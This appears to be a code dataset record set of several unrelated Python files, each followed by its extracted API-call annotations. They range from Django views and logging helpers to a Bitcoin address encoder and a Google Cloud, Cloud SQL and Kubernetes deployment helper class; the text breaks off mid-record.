from rest_framework.response import Response from django.core import serializers class SessionResponseMixin(object): ''' Class: SessionResponseMixin: Arguments: - Object: mixin object Defenition: Creates a valid object that needs to be returned as the response for the client request. Return params: - Reponse: contains json data and status of the request. ''' def render_to_response(self, user, token, status, error, token_expiry=None): response_data = dict(id=None, username='', email='', first_name='', last_name='', profile='', is_authenticated=False, is_admin=False, token=token, error=error, token_expiry=token_expiry) if user: profile = dict() if hasattr(user, 'profile'): profile = user.profile.getObject() response_data = dict(id=user.id, username=user.username, profile=profile, email=user.email, first_name=user.first_name, last_name=user.last_name, is_authenticated=user.is_authenticated, is_admin=user.is_superuser, token=token, error=error, token_expiry=token_expiry) return Response(response_data, status)
[ "rest_framework.response.Response" ]
[((1223, 1254), 'rest_framework.response.Response', 'Response', (['response_data', 'status'], {}), '(response_data, status)\n', (1231, 1254), False, 'from rest_framework.response import Response\n')]
import logging def get_logger(name: str, logfile: str = "log.txt") -> logging.Logger: logger = logging.getLogger(name) logger.setLevel(logging.DEBUG) # ファイルハンドラの作成 file_handler = logging.FileHandler(logfile) file_handler.setLevel(logging.DEBUG) file_handler_formatter = logging.Formatter( "%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(message)s" ) file_handler.setFormatter(file_handler_formatter) console_handler = logging.StreamHandler() console_handler.setLevel(logging.DEBUG) console_handler_formatter = logging.Formatter( "%(asctime)s.%(msecs)-3d - %(levelname)s - %(message)s", "%Y-%m-%d %H:%M:%S", ) console_handler.setFormatter(console_handler_formatter) logger.addHandler(file_handler) logger.addHandler(console_handler) return logger
[ "logging.getLogger", "logging.Formatter", "logging.StreamHandler", "logging.FileHandler" ]
[((101, 124), 'logging.getLogger', 'logging.getLogger', (['name'], {}), '(name)\n', (118, 124), False, 'import logging\n'), ((198, 226), 'logging.FileHandler', 'logging.FileHandler', (['logfile'], {}), '(logfile)\n', (217, 226), False, 'import logging\n'), ((297, 394), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(message)s"""'], {}), "(\n '%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(message)s')\n", (314, 394), False, 'import logging\n'), ((481, 504), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (502, 504), False, 'import logging\n'), ((581, 680), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s.%(msecs)-3d - %(levelname)s - %(message)s"""', '"""%Y-%m-%d %H:%M:%S"""'], {}), "('%(asctime)s.%(msecs)-3d - %(levelname)s - %(message)s',\n '%Y-%m-%d %H:%M:%S')\n", (598, 680), False, 'import logging\n')]
from django.urls import path from . import views from . import gviews app_name='polls' urlpatterns = [ # ex: /polls/ path('', views.index, name='index'), # ex: /polls/5/ path('<int:question_id>/', views.detail, name='detail'), # ex: /polls/5/results/ path('<int:question_id>/results/', views.results, name='results'), # ex: /polls/5/vote/ path('<int:question_id>/vote/', views.vote, name='vote'), path('v2/', gviews.IndexView.as_view(), name='index'), path('v2/<int:pk>/', gviews.DetailView.as_view(), name='detail'), path('v2/<int:pk>/results/', gviews.ResultsView.as_view(), name='results'), path('v2/<int:question_id>/vote/', gviews.vote, name='vote'), ]
[ "django.urls.path" ]
[((128, 163), 'django.urls.path', 'path', (['""""""', 'views.index'], {'name': '"""index"""'}), "('', views.index, name='index')\n", (132, 163), False, 'from django.urls import path\n'), ((189, 244), 'django.urls.path', 'path', (['"""<int:question_id>/"""', 'views.detail'], {'name': '"""detail"""'}), "('<int:question_id>/', views.detail, name='detail')\n", (193, 244), False, 'from django.urls import path\n'), ((278, 343), 'django.urls.path', 'path', (['"""<int:question_id>/results/"""', 'views.results'], {'name': '"""results"""'}), "('<int:question_id>/results/', views.results, name='results')\n", (282, 343), False, 'from django.urls import path\n'), ((374, 430), 'django.urls.path', 'path', (['"""<int:question_id>/vote/"""', 'views.vote'], {'name': '"""vote"""'}), "('<int:question_id>/vote/', views.vote, name='vote')\n", (378, 430), False, 'from django.urls import path\n'), ((646, 706), 'django.urls.path', 'path', (['"""v2/<int:question_id>/vote/"""', 'gviews.vote'], {'name': '"""vote"""'}), "('v2/<int:question_id>/vote/', gviews.vote, name='vote')\n", (650, 706), False, 'from django.urls import path\n')]
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import struct from socket import inet_aton, inet_ntoa from typing import NamedTuple from .Struct import Struct Payload = NamedTuple('Payload', (('ip', str), ('port', int), ('services', int))) class Netaddr(Payload, Struct): """ Network address structure for use in Bitcoin protocol messages .. Network address structure in Bitcoin wiki: https://en.bitcoin.it/wiki/Protocol_documentation#Network_address """ def __str__(self) -> str: return 'netaddr:({ip}:{port}, s: {s:b})'.format(ip=self.ip, port=self.port, s=self.services,) def __repr__(self) -> str: return str(self) def encode(self) -> bytes: """ Encode object ot Bitcoin's netaddr structure Returns ------- bytes encoded message """ p = bytearray() # type: bytearray p.extend(struct.pack('<q', self.services)) p.extend(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff') p.extend(struct.pack('>4sH', inet_aton(self.ip), self.port)) return bytes(p) @staticmethod def decode(n: bytes) -> Payload: """ Decode netaddr from bytes Parameters ---------- n : bytes netaddr structure to decode Returns ------- NamedTuple (Payload) NamedTuple with all parsed fields (services, ipaddr, port) """ services = struct.unpack('<Q', n[:8])[0] # type: int (addr, port) = struct.unpack('>4sH', n[-6:]) # type: bytes, int ip = inet_ntoa(addr) # type: interpret return Payload(ip=ip, port=port, services=services)
[ "struct.pack", "struct.unpack", "socket.inet_aton", "socket.inet_ntoa", "typing.NamedTuple" ]
[((171, 241), 'typing.NamedTuple', 'NamedTuple', (['"""Payload"""', "(('ip', str), ('port', int), ('services', int))"], {}), "('Payload', (('ip', str), ('port', int), ('services', int)))\n", (181, 241), False, 'from typing import NamedTuple\n'), ((1663, 1692), 'struct.unpack', 'struct.unpack', (['""">4sH"""', 'n[-6:]'], {}), "('>4sH', n[-6:])\n", (1676, 1692), False, 'import struct\n'), ((1726, 1741), 'socket.inet_ntoa', 'inet_ntoa', (['addr'], {}), '(addr)\n', (1735, 1741), False, 'from socket import inet_aton, inet_ntoa\n'), ((1028, 1060), 'struct.pack', 'struct.pack', (['"""<q"""', 'self.services'], {}), "('<q', self.services)\n", (1039, 1060), False, 'import struct\n'), ((1597, 1623), 'struct.unpack', 'struct.unpack', (['"""<Q"""', 'n[:8]'], {}), "('<Q', n[:8])\n", (1610, 1623), False, 'import struct\n'), ((1169, 1187), 'socket.inet_aton', 'inet_aton', (['self.ip'], {}), '(self.ip)\n', (1178, 1187), False, 'from socket import inet_aton, inet_ntoa\n')]
from rake_nltk import Rake import nltk from nltk.stem import WordNetLemmatizer from qualkit.stopwords import stopwords nltk.download('wordnet') # initiate nltk lemmatiser lemma = WordNetLemmatizer() r = Rake(stopwords=stopwords, min_length=1, max_length=4) def rake_implement(x, r): r.extract_keywords_from_text(x) return r.get_ranked_phrases() def add_keywords(df, column): df = df.copy() df['keywords'] = df[column].apply(lambda x: rake_implement(x, r)) df['keywords'] = df['keywords'].apply(lambda x: [lemma.lemmatize(y) for y in x]) df = df.explode('keywords') df.dropna(subset=['keywords'], inplace=True) return df
[ "rake_nltk.Rake", "nltk.stem.WordNetLemmatizer", "nltk.download" ]
[((121, 145), 'nltk.download', 'nltk.download', (['"""wordnet"""'], {}), "('wordnet')\n", (134, 145), False, 'import nltk\n'), ((182, 201), 'nltk.stem.WordNetLemmatizer', 'WordNetLemmatizer', ([], {}), '()\n', (199, 201), False, 'from nltk.stem import WordNetLemmatizer\n'), ((207, 260), 'rake_nltk.Rake', 'Rake', ([], {'stopwords': 'stopwords', 'min_length': '(1)', 'max_length': '(4)'}), '(stopwords=stopwords, min_length=1, max_length=4)\n', (211, 260), False, 'from rake_nltk import Rake\n')]
from termcolor import colored v = float(input('Velocidade do carro, em Km/h: ')) if v > 80: print(colored('Ultrapassou a velocidade de 80Km/h, multa de: R${}'.format(7 * (v - 80)), 'red')) else: print(colored('Tenha um bom dia, dirija com seguraça!', 'green'))
[ "termcolor.colored" ]
[((210, 268), 'termcolor.colored', 'colored', (['"""Tenha um bom dia, dirija com seguraça!"""', '"""green"""'], {}), "('Tenha um bom dia, dirija com seguraça!', 'green')\n", (217, 268), False, 'from termcolor import colored\n')]
import json import subprocess import sys from abc import abstractmethod from pathlib import Path from pprint import pformat from time import sleep from typing import Sequence, MutableMapping, Union, Any, Mapping, MutableSequence import pymysql from googleapiclient.discovery import build from googleapiclient.errors import HttpError from pymysql import Connection class SqlExecutor: def __init__(self, svc: 'ExternalServices') -> None: super().__init__() self._svc: 'ExternalServices' = svc @abstractmethod def open(self) -> None: raise NotImplementedError() @abstractmethod def close(self) -> None: raise NotImplementedError() @abstractmethod def execute_sql(self, sql: str): raise NotImplementedError() @abstractmethod def execute_sql_script(self, path: str): raise NotImplementedError() class ProxySqlExecutor(SqlExecutor): def __init__(self, svc: 'ExternalServices', project_id: str, instance: str, password: str, region: str) -> None: super().__init__(svc=svc) self._project_id: str = project_id self._instance: str = instance self._username: str = 'root' self._password: str = password self._region: str = region self._proxy_process: subprocess.Popen = None self._connection: Connection = None def open(self) -> None: self._svc.update_gcp_sql_user(project_id=self._project_id, instance=self._instance, password=self._password) self._proxy_process: subprocess.Popen = \ subprocess.Popen([f'/usr/local/bin/cloud_sql_proxy', f'-instances={self._project_id}:{self._region}:{self._instance}=tcp:3306', f'-credential_file=/deployster/service-account.json']) try: self._proxy_process.wait(2) raise Exception(f"could not start Cloud SQL Proxy!") except subprocess.TimeoutExpired: pass print(f"Connecting to MySQL...", file=sys.stderr) self._connection: Connection = pymysql.connect(host='localhost', port=3306, user=self._username, password=self._password, db='INFORMATION_SCHEMA', charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor) def close(self) -> None: try: self._connection.close() finally: self._proxy_process.terminate() def execute_sql(self, sql: str) -> Sequence[dict]: with self._connection.cursor() as cursor: cursor.execute(sql) return [row for row in cursor.fetchall()] def execute_sql_script(self, path: str): command = \ f"/usr/bin/mysql --user={self._username} " \ f" --password={self._password} " \ f" --host=127.0.0.1 information_schema < {path}" subprocess.run(command, shell=True, check=True) def region_from_zone(zone: str) -> str: return zone[0:zone.rfind('-')] class ExternalServices: def __init__(self) -> None: super().__init__() self._gcp_service_cache: MutableMapping[str, Any] = {} def _get_gcp_service(self, service_name, version) -> Any: service_key = service_name + '_' + version if service_key not in self._gcp_service_cache: self._gcp_service_cache[service_key] = build(serviceName=service_name, version=version) return self._gcp_service_cache[service_key] def find_gcp_project(self, project_id: str) -> Union[None, dict]: filter: str = f"name:{project_id}" result: dict = self._get_gcp_service('cloudresourcemanager', 'v1').projects().list(filter=filter).execute() if 'projects' not in result: return None projects: Sequence[dict] = result['projects'] if len(projects) == 0: return None elif len(projects) > 1: raise Exception(f"too many GCP projects matched filter '{filter}'") else: return projects[0] def find_gcp_project_billing_info(self, project_id: str) -> Union[None, dict]: try: service = self._get_gcp_service('cloudbilling', 'v1') return service.projects().getBillingInfo(name=f"projects/{project_id}").execute() except HttpError as e: if e.resp.status == 404: return None else: raise def find_gcp_project_enabled_apis(self, project_id: str) -> Sequence[str]: service = self._get_gcp_service('servicemanagement', 'v1') result: dict = service.services().list(consumerId=f'project:{project_id}').execute() if 'services' in result: return [api['serviceName'] for api in result['services']] else: return [] def create_gcp_project(self, body: dict) -> None: service = self._get_gcp_service('cloudresourcemanager', 'v1').projects() self.wait_for_gcp_resource_manager_operation(service.create(body=body).execute()) def update_gcp_project(self, project_id: str, body: dict) -> None: service = self._get_gcp_service('cloudresourcemanager', 'v1').projects() self.wait_for_gcp_resource_manager_operation(service.update(projectId=project_id, body=body).execute()) def update_gcp_project_billing_info(self, project_id: str, body: dict) -> None: service = self._get_gcp_service('cloudbilling', 'v1').projects() service.updateBillingInfo(name=f'projects/{project_id}', body=body).execute() def enable_gcp_project_api(self, project_id: str, api: str) -> None: self.wait_for_gcp_service_manager_operation( self._get_gcp_service('servicemanagement', 'v1').services().enable(serviceName=api, body={ 'consumerId': f"project:{project_id}" }).execute()) def disable_gcp_project_api(self, project_id: str, api: str) -> None: self.wait_for_gcp_service_manager_operation( self._get_gcp_service('servicemanagement', 'v1').services().disable(serviceName=api, body={ 'consumerId': f"project:{project_id}" }).execute()) def wait_for_gcp_service_manager_operation(self, result): if 'response' in result: return result['response'] operations_service = self._get_gcp_service('servicemanagement', 'v1').operations() while True: sleep(5) result = operations_service.get(name=result['name']).execute() if 'done' in result and result['done']: if 'response' in result: return result['response'] elif 'error' in result: raise Exception("ERROR: %s" % json.dumps(result['error'])) else: raise Exception("UNKNOWN ERROR: %s" % json.dumps(result)) def wait_for_gcp_resource_manager_operation(self, result): if 'response' in result: return result['response'] operations_service = self._get_gcp_service('cloudresourcemanager', 'v1').operations() while True: sleep(5) result = operations_service.get(name=result['name']).execute() if 'done' in result and result['done']: if 'response' in result: return result['response'] elif 'error' in result: raise Exception("ERROR: %s" % json.dumps(result['error'])) else: raise Exception("UNKNOWN ERROR: %s" % json.dumps(result)) def find_service_account(self, project_id: str, email: str): try: sa_resource_name: str = f"projects/-/serviceAccounts/{email}" return self._get_gcp_service('iam', 'v1').projects().serviceAccounts().get(name=sa_resource_name).execute() except HttpError as e: if e.resp.status == 404: return None else: raise def create_service_account(self, project_id: str, email: str, display_name: str): self._get_gcp_service('iam', 'v1').projects().serviceAccounts().create(name=f"projects/{project_id}", body={ 'accountId': email[0:email.find('@')], 'serviceAccount': { 'displayName': display_name if display_name else email[0:email.find('@')].capitalize() } }).execute() def update_service_account_display_name(self, project_id: str, email: str, display_name: str, etag: str): sa_resource_name: str = f"projects/-/serviceAccounts/{email}" self._get_gcp_service('iam', 'v1').projects().serviceAccounts().update(name=sa_resource_name, body={ 'displayName': display_name if display_name else email[0:email.find('@')].capitalize(), 'etag': etag }).execute() def get_project_iam_policy(self, project_id: str): service = self._get_gcp_service('cloudresourcemanager', 'v1') return service.projects().getIamPolicy(resource=project_id, body={}).execute() def update_project_iam_policy(self, project_id: str, etag: str, bindings: Sequence[dict], verbose: bool = False): existing_policy: dict = self.get_project_iam_policy(project_id=project_id) print(f"About to update IAM policy for project '{project_id}'.\n" f"For reference, due to the sensitivity of this operation, here is the current IAM policy bindings:\n" f"\n" f"{pformat(existing_policy['bindings'])}\n" f"\n" f"The new IAM policy bindings will be:\n" f"{pformat(bindings)}") service = self._get_gcp_service('cloudresourcemanager', 'v1') service.projects().setIamPolicy(resource=project_id, body={ 'policy': { 'bindings': bindings, 'etag': etag } }).execute() def get_gcp_sql_allowed_tiers(self, project_id: str) -> Mapping[str, str]: sql_service = self._get_gcp_service('sqladmin', 'v1beta4') return {tier['tier']: tier for tier in sql_service.tiers().list(project=project_id).execute()['items'] if tier['tier'].startswith('db-')} def get_gcp_sql_allowed_flags(self) -> Mapping[str, str]: service = self._get_gcp_service('sqladmin', 'v1beta4') return {flag['name']: flag for flag in service.flags().list(databaseVersion='MYSQL_5_7').execute()['items']} def get_gcp_sql_instance(self, project_id: str, instance_name: str): # using "instances().list(..)" because "get" throws 403 when instance does not exist # also, it seems the "filter" parameter for "list" does not work; so we fetch all instances and filter here result = self._get_gcp_service('sqladmin', 'v1beta4').instances().list(project=project_id).execute() if 'items' in result: for instance in result['items']: if instance['name'] == instance_name: return instance return None def get_gcp_sql_users(self, project_id: str, instance_name: str) -> Sequence[dict]: users_service = self._get_gcp_service('sqladmin', 'v1beta4').users() result = users_service.list(project=project_id, instance=instance_name).execute() users: MutableSequence[dict] = [] if 'items' in result: for user in result['items']: users.append({'name': user['name'], 'password': user['password'] if 'password' in user else None}) return users def create_gcp_sql_user(self, project_id: str, instance_name: str, user_name: str, password: str) -> None: users_service = self._get_gcp_service('sqladmin', 'v1beta4').users() result = users_service.insert(project=project_id, instance=instance_name, body={ 'name': user_name, 'password': password }).execute() def create_gcp_sql_instance(self, project_id: str, body: dict) -> None: sql_service = self._get_gcp_service('sqladmin', 'v1beta4') try: op = sql_service.instances().insert(project=project_id, body=body).execute() self.wait_for_gcp_sql_operation(project_id=project_id, operation=op) except HttpError as e: status = e.resp.status if status == 409: raise Exception(f"failed creating SQL instance, possibly due to instance name reuse (you can't " f"reuse an instance name for a week after its deletion)") from e else: raise def patch_gcp_sql_instance(self, project_id: str, instance: str, body: dict) -> None: service = self._get_gcp_service('sqladmin', 'v1beta4') op = service.instances().patch(project=project_id, instance=instance, body=body).execute() self.wait_for_gcp_sql_operation(project_id=project_id, operation=op) def update_gcp_sql_user(self, project_id: str, instance: str, password: str) -> None: service = self._get_gcp_service('sqladmin', 'v1beta4') op = service.users().update(project=project_id, instance=instance, host='%', name='root', body={ 'password': password }).execute() self.wait_for_gcp_sql_operation(project_id=project_id, operation=op) def create_gcp_sql_executor(self, **kwargs) -> SqlExecutor: return ProxySqlExecutor(svc=self, project_id=kwargs['project_id'], instance=kwargs['instance'], password=kwargs['password'], region=kwargs['region']) def wait_for_gcp_sql_operation(self, project_id: str, operation: dict, timeout=60 * 30): operations_service = self._get_gcp_service('sqladmin', 'v1beta4').operations() interval = 5 counter = 0 while True: sleep(interval) counter = counter + interval result = operations_service.get(project=project_id, operation=operation['name']).execute() if 'status' in result and result['status'] == 'DONE': if 'error' in result: raise Exception("ERROR: %s" % json.dumps(result['error'])) else: return result if counter >= timeout: raise Exception(f"Timed out waiting for Google Cloud SQL operation: {json.dumps(result,indent=2)}") def get_gke_cluster(self, project_id: str, zone: str, name: str): clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters() try: return clusters_service.get(projectId=project_id, zone=zone, clusterId=name).execute() except HttpError as e: if e.resp.status == 404: return None else: raise def get_gke_cluster_node_pool(self, project_id: str, zone: str, name: str, pool_name: str): clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters() try: return clusters_service.nodePools().get(projectId=project_id, zone=zone, clusterId=name, nodePoolId=pool_name).execute() except HttpError as e: if e.resp.status == 404: return None else: raise def get_gke_server_config(self, project_id: str, zone: str) -> dict: service = self._get_gcp_service('container', 'v1') return service.projects().zones().getServerconfig(projectId=project_id, zone=zone).execute() def create_gke_cluster(self, project_id: str, zone: str, body: dict, timeout: int = 60 * 15): clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters() op = clusters_service.create(projectId=project_id, zone=zone, body=body).execute() self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout) def update_gke_cluster_master_version(self, project_id: str, zone: str, name: str, version: str, timeout: int = 60 * 15): clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters() body = {'masterVersion': version} op = clusters_service.master(projectId=project_id, zone=zone, clusterId=name, body=body).execute() self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout) def update_gke_cluster(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15): clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters() op = clusters_service.update(projectId=project_id, zone=zone, clusterId=name, body=body).execute() self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout) def update_gke_cluster_legacy_abac(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15): clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters() op = clusters_service.legacyAbac(projectId=project_id, zone=zone, clusterId=name, body=body).execute() self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout) def update_gke_cluster_monitoring(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15): clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters() op = clusters_service.monitoring(projectId=project_id, zone=zone, clusterId=name, body=body).execute() self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout) def update_gke_cluster_logging(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15): clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters() op = clusters_service.logging(projectId=project_id, zone=zone, clusterId=name, body=body).execute() self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout) def update_gke_cluster_addons(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15): clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters() op = clusters_service.addons(projectId=project_id, zone=zone, clusterId=name, body=body).execute() self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout) def create_gke_cluster_node_pool(self, project_id: str, zone: str, name: str, node_pool_body: dict, timeout: int = 60 * 15): pools_service = self._get_gcp_service('container', 'v1').projects().zones().clusters().nodePools() op = pools_service.create(projectId=project_id, zone=zone, clusterId=name, body={"nodePool": node_pool_body}).execute() self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout) def update_gke_cluster_node_pool(self, project_id: str, zone: str, cluster_name: str, pool_name: str, body: dict, timeout: int = 60 * 15): pools_service = self._get_gcp_service('container', 'v1').projects().zones().clusters().nodePools() op = pools_service.update(projectId=project_id, zone=zone, clusterId=cluster_name, nodePoolId=pool_name, body=body).execute() self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout) def update_gke_cluster_node_pool_management(self, project_id: str, zone: str, cluster_name: str, pool_name: str, body: dict, timeout: int = 60 * 15): pools_service = self._get_gcp_service('container', 'v1').projects().zones().clusters().nodePools() op = pools_service.setManagement(projectId=project_id, zone=zone, clusterId=cluster_name, nodePoolId=pool_name, body=body).execute() self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout) def update_gke_cluster_node_pool_autoscaling(self, project_id: str, zone: str, cluster_name: str, pool_name: str, body: dict, timeout: int = 60 * 15): pools_service = self._get_gcp_service('container', 'v1').projects().zones().clusters().nodePools() op = pools_service.autoscaling(projectId=project_id, zone=zone, clusterId=cluster_name, nodePoolId=pool_name, body=body).execute() self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout) def wait_for_gke_zonal_operation(self, project_id: str, zone: str, operation: dict, timeout: int = 60 * 15): operations_service = self._get_gcp_service('container', 'v1').projects().zones().operations() interval = 5 counter = 0 while True: sleep(interval) counter = counter + interval result = operations_service.get(projectId=project_id, zone=zone, operationId=operation['name']).execute() if 'status' in result and result['status'] == 'DONE': if 'error' in result: raise Exception("ERROR: %s" % json.dumps(result['error'])) else: return result if counter >= timeout: raise Exception(f"Timed out waiting for GKE zonal operation: {json.dumps(result,indent=2)}") def generate_gcloud_access_token(self, json_credentials_file: Path) -> str: # first, make gcloud use our service account command = f"gcloud auth activate-service-account --key-file={json_credentials_file}" subprocess.run(command, check=True, shell=True) # extract our service account's GCP access token process = subprocess.run(f"gcloud auth print-access-token", check=True, shell=True, stdout=subprocess.PIPE) return process.stdout.decode('utf-8').strip() def get_gcp_compute_regional_ip_address(self, project_id: str, region: str, name: str) -> Union[None, dict]: try: return self._get_gcp_service('compute', 'v1').addresses().get(project=project_id, region=region, address=name).execute() except HttpError as e: if e.resp.status == 404: return None else: raise def create_gcp_compute_regional_ip_address(self, project_id: str, region: str, name: str, timeout: int = 60 * 5): addresses_service = self._get_gcp_service('compute', 'v1').addresses() result = addresses_service.insert(project=project_id, region=region, body={'name': name}).execute() self.wait_for_gcp_compute_regional_operation(project_id=project_id, region=region, operation=result, timeout=timeout) def wait_for_gcp_compute_regional_operation(self, project_id: str, region: str, operation: dict, timeout: int = 60 * 5): operations_service = self._get_gcp_service('compute', 'v1').regionOperations() interval = 5 counter = 0 while True: sleep(interval) counter = counter + interval result = operations_service.get(project=project_id, region=region, operation=operation['name']).execute() if 'status' in result and result['status'] == 'DONE': if 'error' in result: raise Exception("ERROR: %s" % json.dumps(result['error'])) else: return result if counter >= timeout: raise Exception( f"Timed out waiting for Google Compute regional operation: {json.dumps(result,indent=2)}") def get_gcp_compute_global_ip_address(self, project_id: str, name: str) -> Union[None, dict]: try: return self._get_gcp_service('compute', 'v1').globalAddresses().get(project=project_id, address=name).execute() except HttpError as e: if e.resp.status == 404: return None else: raise def create_gcp_compute_global_ip_address(self, project_id: str, name: str, timeout: int = 60 * 5): addresses_service = self._get_gcp_service('compute', 'v1').globalAddresses() result = addresses_service.insert(project=project_id, body={'name': name}).execute() self.wait_for_gcp_compute_global_operation(project_id=project_id, operation=result, timeout=timeout) def wait_for_gcp_compute_global_operation(self, project_id: str, operation: dict, timeout: int = 60 * 5): operations_service = self._get_gcp_service('compute', 'v1').globalOperations() interval = 5 counter = 0 while True: sleep(interval) counter = counter + interval result = operations_service.get(project=project_id, operation=operation['name']).execute() if 'status' in result and result['status'] == 'DONE': if 'error' in result: raise Exception("ERROR: %s" % json.dumps(result['error'])) else: return result if counter >= timeout: raise Exception(f"Timed out waiting for Google Compute global operation: {json.dumps(result,indent=2)}") def find_k8s_cluster_object(self, manifest: dict) -> Union[None, dict]: cmd = f"kubectl get {manifest['kind']} {manifest['metadata']['name']} --ignore-not-found=true --output=json" process = subprocess.run(f"{cmd}", shell=True, check=True, stdout=subprocess.PIPE) return json.loads(process.stdout) if process.stdout else None def find_k8s_namespace_object(self, manifest: dict) -> Union[None, dict]: metadata: dict = manifest['metadata'] kind: str = manifest['kind'] name: str = metadata['name'] namespace: str = metadata['namespace'] cmd: str = f"kubectl get --namespace {namespace} {kind} {name} --ignore-not-found=true --output=json" process = subprocess.run(f"{cmd}", shell=True, check=True, stdout=subprocess.PIPE) return json.loads(process.stdout) if process.stdout else None def create_k8s_object(self, manifest: dict, timeout: int = 60 * 5, verbose: bool = False) -> None: if verbose: print(f"Creating Kubernetes object from:\n{json.dumps(manifest, indent=2)}") subprocess.run(f"kubectl create --save-config=true -f -", input=json.dumps(manifest), encoding='utf-8', check=True, timeout=timeout, shell=True) def update_k8s_object(self, manifest: dict, timeout: int = 60 * 5, force: bool = False, verbose: bool = False) \ -> None: if verbose: print(f"Updating Kubernetes object from:\n{json.dumps(manifest, indent=2)}") subprocess.run(f"kubectl apply --force={'true' if force else 'false'} -f -", input=json.dumps(manifest), encoding='utf-8', check=True, timeout=timeout, shell=True)
[ "json.loads", "subprocess.Popen", "subprocess.run", "pymysql.connect", "json.dumps", "time.sleep", "pprint.pformat", "googleapiclient.discovery.build" ]
[((1571, 1761), 'subprocess.Popen', 'subprocess.Popen', (["[f'/usr/local/bin/cloud_sql_proxy',\n f'-instances={self._project_id}:{self._region}:{self._instance}=tcp:3306',\n f'-credential_file=/deployster/service-account.json']"], {}), "([f'/usr/local/bin/cloud_sql_proxy',\n f'-instances={self._project_id}:{self._region}:{self._instance}=tcp:3306',\n f'-credential_file=/deployster/service-account.json'])\n", (1587, 1761), False, 'import subprocess\n'), ((2089, 2273), 'pymysql.connect', 'pymysql.connect', ([], {'host': '"""localhost"""', 'port': '(3306)', 'user': 'self._username', 'password': 'self._password', 'db': '"""INFORMATION_SCHEMA"""', 'charset': '"""utf8mb4"""', 'cursorclass': 'pymysql.cursors.DictCursor'}), "(host='localhost', port=3306, user=self._username, password=\n self._password, db='INFORMATION_SCHEMA', charset='utf8mb4', cursorclass\n =pymysql.cursors.DictCursor)\n", (2104, 2273), False, 'import pymysql\n'), ((3194, 3241), 'subprocess.run', 'subprocess.run', (['command'], {'shell': '(True)', 'check': '(True)'}), '(command, shell=True, check=True)\n', (3208, 3241), False, 'import subprocess\n'), ((23825, 23872), 'subprocess.run', 'subprocess.run', (['command'], {'check': '(True)', 'shell': '(True)'}), '(command, check=True, shell=True)\n', (23839, 23872), False, 'import subprocess\n'), ((23949, 24050), 'subprocess.run', 'subprocess.run', (['f"""gcloud auth print-access-token"""'], {'check': '(True)', 'shell': '(True)', 'stdout': 'subprocess.PIPE'}), "(f'gcloud auth print-access-token', check=True, shell=True,\n stdout=subprocess.PIPE)\n", (23963, 24050), False, 'import subprocess\n'), ((28278, 28350), 'subprocess.run', 'subprocess.run', (['f"""{cmd}"""'], {'shell': '(True)', 'check': '(True)', 'stdout': 'subprocess.PIPE'}), "(f'{cmd}', shell=True, check=True, stdout=subprocess.PIPE)\n", (28292, 28350), False, 'import subprocess\n'), ((28795, 28867), 'subprocess.run', 'subprocess.run', (['f"""{cmd}"""'], {'shell': '(True)', 'check': '(True)', 'stdout': 'subprocess.PIPE'}), "(f'{cmd}', shell=True, check=True, stdout=subprocess.PIPE)\n", (28809, 28867), False, 'import subprocess\n'), ((3688, 3736), 'googleapiclient.discovery.build', 'build', ([], {'serviceName': 'service_name', 'version': 'version'}), '(serviceName=service_name, version=version)\n', (3693, 3736), False, 'from googleapiclient.discovery import build\n'), ((6735, 6743), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (6740, 6743), False, 'from time import sleep\n'), ((7441, 7449), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (7446, 7449), False, 'from time import sleep\n'), ((14230, 14245), 'time.sleep', 'sleep', (['interval'], {}), '(interval)\n', (14235, 14245), False, 'from time import sleep\n'), ((23032, 23047), 'time.sleep', 'sleep', (['interval'], {}), '(interval)\n', (23037, 23047), False, 'from time import sleep\n'), ((25799, 25814), 'time.sleep', 'sleep', (['interval'], {}), '(interval)\n', (25804, 25814), False, 'from time import sleep\n'), ((27509, 27524), 'time.sleep', 'sleep', (['interval'], {}), '(interval)\n', (27514, 27524), False, 'from time import sleep\n'), ((28366, 28392), 'json.loads', 'json.loads', (['process.stdout'], {}), '(process.stdout)\n', (28376, 28392), False, 'import json\n'), ((28883, 28909), 'json.loads', 'json.loads', (['process.stdout'], {}), '(process.stdout)\n', (28893, 28909), False, 'import json\n'), ((29246, 29266), 'json.dumps', 'json.dumps', (['manifest'], {}), '(manifest)\n', (29256, 29266), False, 'import json\n'), ((29781, 29801), 'json.dumps', 'json.dumps', (['manifest'], {}), '(manifest)\n', (29791, 29801), False, 'import 